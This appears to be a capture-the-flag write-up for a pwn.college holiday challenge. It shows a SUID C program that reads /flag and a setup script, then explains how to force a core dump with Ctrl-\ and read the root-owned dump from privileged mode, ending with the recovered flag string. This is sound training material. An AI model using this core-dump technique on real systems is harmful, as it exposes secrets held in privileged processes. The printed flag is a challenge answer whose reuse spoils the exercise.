Attachment:
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
char gift[256];
void wrap(char *gift, size_t size)
{
fprintf(stdout, "Wrapping gift: [ ] 0%%");
for (int i = 0; i < size; i++) {
sleep(1);
gift[i] = "#####\n"[i % 6];
int progress = (i + 1) * 100 / size;
int bars = progress / 10;
fprintf(stdout, "\rWrapping gift: [");
for (int j = 0; j < 10; j++) {
fputc(j < bars ? '=' : ' ', stdout);
}
fprintf(stdout, "] %d%%", progress);
fflush(stdout);
}
fprintf(stdout, "\n🎁 Gift wrapped successfully!\n\n");
}
void sigtstp_handler(int signum)
{
puts("🎅 Santa won't stop!");
}
int main(int argc, char **argv, char **envp)
{
uid_t ruid, euid, suid;
if (getresuid(&ruid, &euid, &suid) == -1) {
perror("getresuid");
return 1;
}
if (euid != 0) {
fprintf(stderr, "❌ Error: Santa must wrap as root!\n");
return 1;
}
if (ruid != 0) {
if (setreuid(0, -1) == -1) {
perror("setreuid");
return 1;
}
fprintf(stdout, "🦌 Now, Dasher! now, Dancer! now, Prancer and Vixen!\nOn, Comet! on Cupid! on, Donder and Blitzen!\n\n");
execve("/proc/self/exe", argv, envp);
perror("execve");
return 127;
}
if (signal(SIGTSTP, sigtstp_handler) == SIG_ERR) {
perror("signal");
return 1;
}
int fd = open("/flag", O_RDONLY);
if (fd == -1) {
perror("open");
return 1;
}
int count = read(fd, gift, sizeof(gift));
if (count == -1) {
perror("read");
return 1;
}
wrap(gift, count);
puts("🎄 Merry Christmas!\n");
puts(gift);
return 0;
}
#!/bin/sh
set -eu
mount -o remount,rw /proc/sys
echo coal > /proc/sys/kernel/core_pattern
mount -o remount,ro /proc/sys
So the SUID program re-execs itself with ruid=0, so it is dumpable. So, we can trigger coredump via Ctrl-\ when it reads the flag and sleeps. However, the coredump generated under ~ is only readable by root. A feature of Dojo the platform is that you can switch to privileged mode with home folder unchanged. Therefore, we can switch to privileged mode to read the core dump generated in unprivileged mode.
# in unprivileged mode
Connected!
ubuntu@2025~day-02:~$ ulimit -c 8192
ubuntu@2025~day-02:~$ /challenge/claus
🦌 Now, Dasher! now, Dancer! now, Prancer and Vixen!
On, Comet! on Cupid! on, Donder and Blitzen!
^\Quit (core dumped)
ubuntu@2025~day-02:~$
# in privileged mode
Connected!
ubuntu@practice~2025~day-02:~$ sudo strings coal | grep pwn
pwn.college{IYS59ZtKQIqB_5De3FZJjnsOXe3.0FO3gTMywyM5EzN0EzW}